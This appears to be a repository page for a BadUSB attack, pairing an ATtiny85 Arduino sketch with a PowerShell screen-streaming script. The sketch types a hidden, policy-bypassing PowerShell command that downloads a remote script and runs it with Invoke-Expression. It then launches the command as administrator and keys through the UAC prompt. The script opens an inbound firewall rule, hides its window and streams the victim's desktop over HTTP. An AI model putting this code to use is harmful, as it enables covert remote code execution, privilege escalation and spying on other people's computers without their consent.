AtTinyCode.ino

#include "DigiKeyboard.h"

// Teclas universais (códigos HID)
#define KEY_MINUS 45
#define KEY_SLASH 56
#define KEY_SPACE 44
#define KEY_COLON 33 // Shift + ;
#define KEY_TAB 43
//#define KEY_SLASH 0x38    // Código físico para tecla '/'
#define KEY_BACKSLASH 0x31  


void setup() {
  DigiKeyboard.sendKeyStroke(0); // Liberar teclas
  
  // Abrir Executar (universal)
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(1500);

  // Digitar comando de forma universal
  sendCharSequence("powershell ", 10);
  sendSpecialChar(KEY_MINUS); // -
  sendCharSequence  ("Ep Bypass ", 10);
  sendSpecialChar(KEY_MINUS); // -
  sendCharSequence("W H ", 10);
  sendSpecialChar(KEY_MINUS); // -
  sendCharSequence("C \"", 10);
  
  // URL do script
  //sendCharSequence("Invoke-RestMethod https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/refs/heads/master/payloads/library/recon/Screenshare-Over-LAN/Screenshare-Over-LAN.ps1 ", 10);

  sendCharSequence("Invoke-RestMethod https://gist.githubusercontent.com/zr0n/950c900240482e1aadd81391fae12325/raw/f59b40f361661a555caf14427b1aadee1cf7f2a2/screenshare_rubber.ps1 ", 10);
  
  // Pipe universal (AltGr+1 ou Shift+\)
  //DigiKeyboard.sendKeyStroke(KEY_SLASH, MOD_SHIFT_RIGHT); // |
  //DigiKeyboard.sendKeyStroke(KEY_SLASH, MOD_SHIFT_LEFT);
 DigiKeyboard.sendKeyStroke(KEY_BACKSLASH, MOD_SHIFT_LEFT);

  sendCharSequence(" Invoke-Expression\"", 10);

  // Executar como admin (universal)
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  
  // Confirmação UAC universal
  handleUAC();
}

void loop() {}

// Função para envio universal de caracteres especiais
void sendSpecialChar(uint8_t key) {
  DigiKeyboard.sendKeyStroke(key);
  DigiKeyboard.delay(50);
}

// Função para sequências de caracteres com timing controlado
void sendCharSequence(const char* text, uint16_t delayTime) {
  for(int i=0; text[i]!='\0'; i++) {
    DigiKeyboard.print(text[i]);
    DigiKeyboard.delay(delayTime);
  }
}

// Sistema de confirmação UAC multi-idioma
void handleUAC() {
  DigiKeyboard.delay(3000);
  
  DigiKeyboard.sendKeyStroke(KEY_TAB, MOD_ALT_LEFT); // Alt+Tab para focar no UAC
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_TAB); 
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_TAB);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER); // Confirma
  
}

screenshare_rubber.ps1

<#
================================================= Beigeworm's Screen Stream over HTTP ==========================================================

SYNOPSIS
Start up a HTTP server and stream the desktop to a browser window on another device on the network.

USAGE
1. Run this script on target computer and note the URL provided
2. on another device on the same network, enter the provided URL in a browser window
3. Hold escape key on target for 5 seconds to exit screenshare.

#>


# Hide the powershell console (1 = yes)
$hide = 1

# Remova todas as regras duplicadas
Get-NetFirewallRule -DisplayName "AllowWebServer" | Remove-NetFirewallRule

# Crie uma única regra corretamente configurada
New-NetFirewallRule -DisplayName "AllowWebServer" `
    -Direction Inbound `
    -Protocol TCP `
    -LocalPort $port `
    -Action Allow `
    -Profile Any `
    -EdgeTraversalPolicy Allow

[Console]::BackgroundColor = "Black"
Clear-Host
[Console]::SetWindowSize(88,30)
[Console]::Title = "HTTP Screenshare"
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName PresentationCore,PresentationFramework
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.Application]::EnableVisualStyles()

# Define port number
if ($port.length -lt 1){
    Write-Host "Using default port.. (8080)" -ForegroundColor Green
    $port = 8080
}

Write-Host "Detecting primary network interface." -ForegroundColor DarkGray
$networkInterfaces = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'Virtual' }
$filteredInterfaces = $networkInterfaces | Where-Object { $_.Name -match 'Wi-Fi|Ethernet' } # Adjusted to common interface names
$primaryInterface = $filteredInterfaces | Select-Object -First 1
if ($primaryInterface) {
    # Get IP address based on the interface's index to ensure accuracy
    $localIP = Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.InterfaceIndex -eq $primaryInterface.ifIndex } | Select-Object -ExpandProperty IPAddress -First 1
    Write-Host "$($primaryInterface.Name) is the primary internet connection. IP: $localIP" -ForegroundColor Green
} else {
    Write-Host "No primary internet connection found." -ForegroundColor Red
    exit
}

New-NetFirewallRule -DisplayName "AllowWebServer" -Direction Inbound -Protocol TCP -LocalPort $port -Action Allow | Out-Null
$webServer = New-Object System.Net.HttpListener 
$webServer.Prefixes.Add("http://$localIP`:$port/")
$webServer.Prefixes.Add("http://localhost:$port/")
$webServer.Start()
Write-Host ("Network Devices Can Reach the server at : http://$localIP`:$port") 
Write-Host "Press escape key for 5 seconds to exit" -f Cyan
Write-Host "Hiding this window.." -f Yellow
sleep 4

# Code to hide the console on Windows 10 and 11
if ($hide -eq 1){
    $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
    $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
    $hwnd = (Get-Process -PID $pid).MainWindowHandle
    
    if ($hwnd -ne [System.IntPtr]::Zero) {
        $Type::ShowWindowAsync($hwnd, 0)
    }
    else {
        $Host.UI.RawUI.WindowTitle = 'hideme'
        $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
        $hwnd = $Proc.MainWindowHandle
        $Type::ShowWindowAsync($hwnd, 0)
    }
}

# Escape to exit key detection
Add-Type @"
using System;
using System.Runtime.InteropServices;

public class Keyboard
{
    [DllImport("user32.dll")]
    public static extern short GetAsyncKeyState(int vKey);
}
"@
$VK_ESCAPE = 0x1B
$startTime = $null

while ($true) {
    try {
        $context = $webServer.GetContext()
        $response = $context.Response
        if ($context.Request.RawUrl -eq "/stream") {
            $response.ContentType = "multipart/x-mixed-replace; boundary=frame"
            $response.Headers.Add("Cache-Control", "no-cache")
            $boundary = "--frame"

            while ($context.Response.OutputStream.CanWrite) {
                $screen = [System.Windows.Forms.Screen]::PrimaryScreen
                $bitmap = New-Object System.Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height
                $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
                $graphics.CopyFromScreen($screen.Bounds.X, $screen.Bounds.Y, 0, 0, $screen.Bounds.Size)

                $stream = New-Object System.IO.MemoryStream
                $bitmap.Save($stream, [System.Drawing.Imaging.ImageFormat]::Png)
                $bitmap.Dispose()
                $graphics.Dispose()

                $bytes = $stream.ToArray()
                $stream.Dispose()

                $writer = [System.Text.Encoding]::ASCII.GetBytes("$boundary`r`nContent-Type: image/png`r`nContent-Length: $($bytes.Length)`r`n`r`n")
                $response.OutputStream.Write($writer, 0, $writer.Length)
                $response.OutputStream.Write($bytes, 0, $bytes.Length)
                $boundaryWriter = [System.Text.Encoding]::ASCII.GetBytes("`r`n")
                $response.OutputStream.Write($boundaryWriter, 0, $boundaryWriter.Length)

                Start-Sleep -Milliseconds 33 

                # Check for the escape key press to exit
                $isEscapePressed = [Keyboard]::GetAsyncKeyState($VK_ESCAPE) -lt 0
                if ($isEscapePressed) {
                    if (-not $startTime) {
                        $startTime = Get-Date
                    }
                    $elapsedTime = (Get-Date) - $startTime
                    if ($elapsedTime.TotalSeconds -ge 5) {
                        (New-Object -ComObject Wscript.Shell).Popup("Screenshare Closed.",3,"Information",0x0)
                        sleep 1
                        exit
                    }
                } else {
                    $startTime = $null
                }

            }
        } else {
            $response.ContentType = "text/html"
            $html = @"
            <!DOCTYPE html>
            <html>
            <head>
                <title>Streaming Video</title>
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <style>
                body {
                    background-color: black;
                    margin: 0;
                    display: flex;
                    justify-content: center;
                    align-items: center;
                    height: 100vh;
                }
                img {
                    width: 90vw;
                    height: auto;
                    max-width: 100%;
                    max-height: 100%;
                }
            </style>
            </head>
            <body>
                <img src='/stream' alt='Streaming Video' />
            </body>
            </html>
"@
            $buffer = [System.Text.Encoding]::UTF8.GetBytes($html)
            $response.OutputStream.Write($buffer, 0, $buffer.Length)
        }
        $response.Close()
    } catch {
        Write-Host "Error encountered: $_"
    }
}
$webServer.Stop()

How to use:
Follow this tutorial for how to setup a bad usb using an ATTiny85 and upload the .ino script of this page.
https://github.com/byui-soc/bad-usb